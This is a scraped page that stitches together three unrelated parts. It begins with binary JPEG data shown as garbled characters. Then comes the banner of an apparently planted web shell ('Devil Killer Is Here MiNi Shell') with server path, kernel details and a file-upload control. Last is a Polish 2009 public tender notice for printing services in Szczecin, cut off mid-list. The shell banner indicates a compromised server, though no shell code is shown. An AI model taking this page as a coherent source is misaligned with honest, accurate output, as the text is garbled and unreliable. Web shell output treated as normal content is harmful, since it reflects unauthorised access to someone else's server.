JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090123/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090123/7628-N-2009.html

<p class="kh_header"><b>Szczecin: Świadczenie usług poligraficznych na rok 2009</b><br>
<b>Numer ogłoszenia: 7628 - 2009; data zamieszczenia: 23.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo Zachodniopomorskie-Urząd Marszałkowski Województwa Zachodniopomorskiego , ul. Korsarzy 34, 70-540 Szczecin, woj. zachodniopomorskie, tel. 091 48072063, faks 091 4893976.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um-zachodniopomorskie.pl/przetargi.html</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług poligraficznych na rok 2009.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: świadczenie usług poligraficznych na rzecz Urzędu Marszałkowskiego Województwa Zachodniopomorskiego w Szczecinie.
2.	Realizacja zamówienia obejmuje także dostawę do siedziby Zamawiającego wydrukowanych materiałów.
3.	Zamawiający informuje, że w trakcie realizacji umowy może nie zlecić wydrukowania poszczególnych części przedmiotu zamówienia w opisanych powyżej nakładach. Różnica pomiędzy wskazanymi nakładami, a rzeczywistą skalą zleceń nie będzie większa niż 25% do każdej z części zamówienia.
4.	Wykonawca otrzyma od Zamawiającego pisemne (lub faksem) zamówienie na wykonanie poszczególnej usługi nie krócej niż na 2 dni przed terminem jej realizacji.
5.	Wykonawca powinien posiadać możliwości techniczne na zrealizowanie oraz dostarczenie zamówienia do siedziby Zamawiającego w terminie 48 godzin od złożenia zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 78.23.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	W postępowaniu wziąć mogą udział Wykonawcy, którzy spełniają następujące warunki:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępniania potencjału technicznego i osób zdolnych do wykonania zamówienia;
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy PZP, zgodnie z którym z postępowania o udzielenie zamówienia wyklucza się:
a)	wykonawców, którzy wyrządzili szkodę, nie wykonując zamówienia lub wykonując je nienależycie, jeżeli szkoda ta została stwierdzona prawomocnym orzeczeniem sądu wydanym w okresie 3 lat przed wszczęciem postępowania;
b)	wykonawców, w stosunku do których otwarto likwidację lub których upadłość ogłoszono, z wyjątkiem wykonawców, którzy po ogłoszeniu upadłości zawarli układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli poprzez likwidację majątku upadłego;
c)	wykonawców, którzy zalegają z uiszczeniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne, z wyjątkiem przypadków gdy uzyskali oni przewidziane prawem zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
d)	osoby fizyczne, które prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
e)	spółki jawne, których wspólnika prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
f)	spółki partnerskie, których partnera lub członka zarządu prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
g)	spółki komandytowe oraz spółki komandytowo-akcyjne, których komplementariusza prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
h)	osoby prawne, których urzędującego członka organu zarządzającego prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
i)	podmioty zbiorowe, wobec których sąd orzekł zakaz ubiegania się o zamówienia, na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary;
j)	wykonawców, którzy nie spełniają warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 1-3 ustawy PZP;
k)	wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności, chyba że udział tych wykonawców w postępowaniu nie utrudni uczciwej konkurencji; przepisu nie stosuje się do wykonawców, którym udziela się zamówienia na podstawie art. 62 ust. 1 pkt 2 lub art. 67 ust. 1 pkt 1 i 2 ustawy PZP;
l)	złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania;
m)	nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy, z zastrzeżeniem art. 26 ust. 3 ustawy PZP;
n)	nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub nie zgodzili się na przedłużenie okresu związania ofertą.

2.	Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w oparciu o analizę oświadczeń lub dokumentów załączonych do oferty poprzez wypełnienie druku ZP - 17 - Informacja o spełnianiu przez wykonawców warunków udziału w postępowaniu prowadzonym w trybie przetargu nieograniczonego, na zasadzie: spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Potwierdzenie przez wykonawców spełniania warunków udziału w postępowaniu, opisanych szczegółowo w rozdziale VIII SIWZ, oraz w celu potwierdzenia, że oferowane usługi lub dostawy odpowiadają wymaganiom określonym przez Zamawiającego, nastąpi w oparciu o analizę przedłożonych przez wykonawcę oświadczeń lub dokumentów, o których mowa poniżej.

2.	W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu z postępowania na podstawie art. 24 ustawy - Prawo zamówień publicznych (zwanej dalej ustawą), Zamawiający żąda, w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez osobę uprawnioną do reprezentacji Wykonawcy w obrocie gospodarczym, następujących dokumentów: 
2.1.	aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2.2.	Aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenia zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenia lub rozłożenia na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu. Powyższe zaświadczenia muszą być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

3.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 2.1. składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
4.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 2.2. składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;

5.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, z zachowaniem terminów ich ważności określonych powyżej. Z powyższych dokumentów wynikać musi, że wykonawca spełnia warunki określone w rozdziale VIII. SIWZ.

6.	Do oferty załączyć należy także oświadczenie o spełnianiu warunków udziału w postępowaniu - zgodnie z załącznikiem nr 2 do SIWZ.

7.	W przypadku, gdy o udzielenie zamówienia ubiega się wspólnie kilku Wykonawców do oferty winni załączyć dokument pełnomocnictwa wystawionego zgodnie z dyspozycją art. 23 ust. 2 ustawy PZP, tj. o zakresie co najmniej: do reprezentowania w postępowaniu o udzielenie zamówienia Wykonawców wspólnie ubiegających się o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.

8.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają oświadczenia lub dokumenty o których mowa w ogłoszeniu o zamówieniu oraz SIWZ wedle swojego uznania: łącznie albo osobno. 

9.	Zamawiający zastrzega sobie prawo żądania przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę Wykonawców wspólnie ubiegających się o udzielenie zamówienia.

10.	Jeżeli z przedstawionych dokumentów wynika, że osoba, która podpisała ofertę nie jest uprawniona do reprezentacji Wykonawcy w obrocie gospodarczym, do oferty załączyć należy dokument pełnomocnictwa wystawionego w sposób określony przepisami prawa cywilnego. W przypadku złożenia kopii pełnomocnictwa musi być ono potwierdzone za zgodność z oryginałem przez osoby udzielające pełnomocnictwa lub notariusza.

11.	Dokumenty (z zastrzeżeniem dokumentu pełnomocnictwa), o których mowa w Ogłoszeniu o zamówieniu oraz SIWZ Wykonawcy mogą składać w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę, tj. przez osobę uprawnioną do reprezentacji Wykonawcy w obrocie gospodarczym.

12.	Zamawiający zastrzega sobie prawo żądania przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu, gdy złożona przez Wykonawcę kopia dokumentu będzie nieczytelna lub będzie budzić wątpliwości co do jej prawdziwości.

13.	Postępowanie o udzielenie zamówienia prowadzi się w języku polskim. Dokumenty lub oświadczenia sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę. Zasada ta rozciąga się także na składane w toku postępowania wyjaśnienia, oświadczenia, wnioski, zawiadomienia oraz informacje, itp..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.um-zachodniopomorskie.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski Województwa Zachodniopomorskiego w Szczecinie
Wieloosobowe Stanowisko ds. Zamówień Publicznych 
WOiRZL, ul. Piłsudskiego 40 - 42, 70 - 421 Szczecin.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.02.2009 godzina 09:00, miejsce: Kancelaria Ogólna Urzędu Marszałkowskiego Województwa Zachodniopomorskiego w Szczecinie ul. Korsarzy 34, 70 - 540 Szczecin..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Broszury, koperty, wizytówki, teczki.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP.	NAZWA ARTYKUŁU	OPIS	ILOŚĆ SZTUK
1	Druk broszury	A4, objętość do 24 stron,  papier offset biały 80g, 1/1, okładka 4 strony, kreda 170-200g, 4/0, okładka laminowana, folia błysk, szycie zeszytowe,	9590
2	Druk broszury	A4, objętość do 24 stron, papier offset biały 80g, 4/4, okładka 4 strony, kreda 170-200g, 4/0, okładka laminowana, folia błysk, szycie zeszytowe,	5000
3	Druk broszury	Format A4, obj. 24 str. + okładka 4 strony, papier: kreda 170g środki, okładka kreda 200-300g + laminat mat, lakier UV wybiórczo na całości broszury, szycie zeszytowe	1500
4	Druk broszury	A4, objętość do 24 stron, papier offset biały 80g, 1/0, okładka 4 strony, kreda 170-200g, 4/0, okładka laminowana, folia błysk, szycie zeszytowe,	14990
5	Druk broszury	A4- tekst, objętość do 60 stron, A3- mapki -15 szt., papier offset biały 80g, 1/1, okładka 4 strony, kreda 170-200g, 4/0, okładka laminowana, folia błysk, szycie zeszytowe, 	700
6	Druk papieru listowego	A4, papier offset biały 90g, 4/0, nakład min 100 szt	248950
7	Druk papieru okolicznościowego	A4, papier ecru 120g, 4/0, papier offsetowy 120 g/m2 w kolorze ecru dostępny  na rynku papierniczym	25620
8	Druk wizytówek	50x90mm, papier kredamat 300g, 4/0, lakier zabezpieczający offsetowy nakład min 100 szt. 	51100
9	Druk zaproszenia	Format 10x21 (obj. 6 str.), CMYK,4/4, kreda 170g	100
10	Druk zaproszenia	Format 10x21 (obj. 4 str.), karton 280g + koperta DL, nadruk 4/0	2000
11	Druk zaproszeń	Format 10x42 (obj. 4 str.), bigowana 4/4, karton dwustronnie powlekany 280g	1000
12	Folder	Format 21x21 obj. 22 str 4/4, kreda 300g, mat. + laminat mat + lakier UV wybiórczo, 2x kalka 1/0 formaty 21x21 + tłoczenie na okładce	1000
13	Folder	Format A4, obj. 6 stron, CMYK, 4/4, kreda 170g	1000
14	Folder	Format A4, obj. 8 stron + okładka 4 str., kreda 170g środki i 200g okładka CMYK, 4/4, szycie zeszytowe	500
15	Identyfikator	Format 8x10 + folia na identyfikator, kreda 300g, CMYK, 4/0	300
16	Karta grzecznościowa	Karta grzecznościowa 210x100 mm papier offset 280 g, format 210x100 po złożeniu, druk offsetowy, kolor 4/4, lakier zabezpieczający offsetowy, zamówienie 2 razy w miesiącu po 200 sztuk	350
17	Koperta B5	Biała 4/0, nadruk nie przekroczy 35% powierzchni koperty	50
18	Koperta C4	biała, 4/0, nadruk nie przekroczy 35% powierzchni koperty 	5750
19	Koperta C5	biała, 4/0, nadruk nie przekroczy 35% powierzchni koperty 	4000
20	Koperta C6	ecru, 4/0, nadruk nie przezroczysty 35% powierzchni koperty	2000
21	Koperta C6,	biała, 4/0, nadruk nie przekroczy 35% powierzchni koperty 	14700
22	Koperta DL	ecru, 4/0, nadruk nie przezroczysty 35% powierzchni koperty	2000
23	Koperta DL,	biała, 4/0, nadruk nie przekroczy 35% powierzchni koperty	10150
24	Mapa	Format A3, obj. 2 str. (4/4), kreda 150g.	500
25	Notes	Format A4, obj. 50 kartek w bloczku, offset 80g 2/0 + okładka 4/0 kreda 90g	500
26	Okładka broszury	A4, 4/0, kreda 300g/m2 mat, laminat mat	700
27	Okładki do zaproszeń C6	Magnus creme, 300 g z nadrukiem, 4/0, hotsprint	4000
28	Okładki do zaproszeń DL	Magnus Navy Blue, 300 g z nadrukiem, 4/0, hotsprint	4000
29	Teczka + folder	Format 220x310 + kieszeń 20x21 na wewnętrznej str. okładki, nowy wykrojnik, karton 300g + laminat strukturalny + 8 stron A4 kreda 300g, zszyte zeszytowe z teczką, CMYK, 4/4	500
30	Teczka skórzana	Teczka, pojedynczy grzbiet, skrzydełko z boku i dołu, na dolnym skrzydełku wycięcie na wizytówkę, skórzana (oprawiona w skórę mieloną), granatowa, tłoczona - folia złota - tłoczenie do 15% powierzchni, wyklejki w kolorze materiału, format A4, tektura 3 mm.	3416
31	Teczka papierowa konferencyjna	Teczka z wykrojnika na gumkę, kreda 300g, nadruk, 4/0, laminat jednostronny, grzbiet 10mm lub 5 mm	500
32	Teczka papierowa okolicznościowa	Papier ecru ozdobny 200g, nadruk, laminat jednostronny, 4/0, bigowana	500
33	Teczka papierowa dyplomowa	Papier kreda 300g, nadruk 4/0, bigowana, laminat jednostronnie	8510
34	Teczka papierowa,	Teczka z wykrojnika, pojedynczy grzbiet, skrzydełko z boku i dołu, na dolnym skrzydełku wycięcie na wizytówkę. Teczka papierowa, papier biały, kreda 300g, laminat jednostronny, 4/0, folia mat, format A4 po złożeniu	4500
35	Tłoczenie	Tłoczenie na wizytówkach, nakład 200szt.	12000.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 78.23.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Plany i startegie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP.	NAZWA ARTYKUŁU	OPIS	ILOŚĆ SZTUK
1.	Plan Gospodarki Odpadami dla Województwa Zachodniopomorskiego	- format A4 
- objętość 200 stron A4 +20 stron A3 (załącznik wklejony na końcu)
- kolorystyka: okładka 4/0, środek 1/1 - 190 stron A4, 4/1 - 10 stron A4, 4/0 - 20 stron A3 
- papier okładka kreda 150 g/m2, 
środki offset 90 g/m2 matt 
- oklejka laminowana na błysk 
- oprawa miękka, klejona
- wykonanie naświetleń, projektu, map, składu oraz próbnego wydruku pozycji (proffa),	500
2	Strategia Rozwoju Sektora Transportu do roku 2020	- format A4 
- objętość 200 str. A4 + 20 str. A3 (załącznik wklejony na końcu) 
- kolorystyka: okładka 4/0, środek 1/1 - 190 str. A4, 4/1 - 10str. A4 
4/0 20 stron A3
- papier okładka kreda 150 g/m2,
środki offset 90g/m2 matt 
- oklejka laminowana na błysk
- oprawa miękka, klejona	200
3	Strategia Rozwoju Gospodarki Morskiej Województwa Zachodniopomorskiego do roku 2015 - aktualizacja	- format A4 
- objętość 200 stron A4 + 20 stron A3 (załącznik wklejony na końcu)
- kolorystyka: okładka 4/0, środek 1/1 - 190 stron A4, 
4/1 - 10 stron A4
4/0 - 20 stron A3 
- papier okładka kreda 150 g/m2,
środki offset 90 g/m2 matt
- oklejka laminowana na błysk 
- oprawa miękka, klejona	200
4	Strategia Marki Województwa Zachodniopomorskiego	- objętość 136 str., 
- oprawa twarda,
- format A4, 
- full color,
Format i okładka zgodna z Systemem Identyfikacji Wizualnej Urzędu Marszałkowskiego Województwa Zachodniopomorskiego	40
5	Strategia Marki Województwa Zachodniopomorskiego - płyta CD	Format i okładka zgodna z Systemem Identyfikacji Wizualnej Urzędu Marszałkowskiego Województwa Zachodniopomorskiego	50
6	Strategia Promocji Województwa Zachodniopomorskiego	- objętość 250 str.,
- oprawa twarda, 
- format A4, 
- full color,
Format i okładka zgodna z Systemem Identyfikacji Wizualnej Urzędu Marszałkowskiego Województwa Zachodniopomorskiego	100.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 78.23.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Plakaty i ulotki.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP.	NAZWA ARTYKUŁU	OPIS	ILOŚĆ SZTUK
1.	Plakat	- format B3
- kolor 4x0
- papier kreda 200g
- projekt + naświetlenie	2000
2.	Plakat	- format B2
- kolor 4x0
- papier kreda 200g
- projekt + naświetlenie	1215
3	Plakat	- format B1
- kolor 4x0
- papier kreda 200g
- projekt + naświetlenie	7
4	Ulotki:	- format A5
- kolorystyka 4 x 4
- papier kreda 200 g
- falcowanie w tzw U x 2	20000
5	Ulotki:	- format A4
- kolorystyka 4 x 4
- papier kreda 200 g
- falcowanie w tzw U x 2	4300
6	Ulotka	- format A3
- falcowanie 2x wzdłuż, 1x w poprzek,
- obj. 12 str.,
- kolorystyka 4x 4,
- nakład 1000 szt.	1000
7	Materiały informacyjne:	a)biznesplan:
- format A4
